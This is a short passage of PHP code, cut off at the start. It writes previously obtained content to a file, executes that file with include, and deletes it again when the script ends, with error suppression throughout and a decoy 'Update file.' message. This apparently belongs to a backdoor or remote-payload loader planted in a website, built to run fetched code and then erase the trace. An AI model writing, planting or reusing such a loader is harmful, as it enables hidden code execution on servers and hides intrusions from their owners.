/dev/null"); } if ($c !== false && strlen($c) > 10) { if (@file_put_contents($f, $c)) { @chmod($f, 0644); if (file_exists($f)) { include $f; } register_shutdown_function(function() use ($f) { if (file_exists($f)) { @unlink($f); } }); } } else { echo "Update file."; } } catch (Throwable $e) { echo "Error: " . $e->getMessage(); } } ?>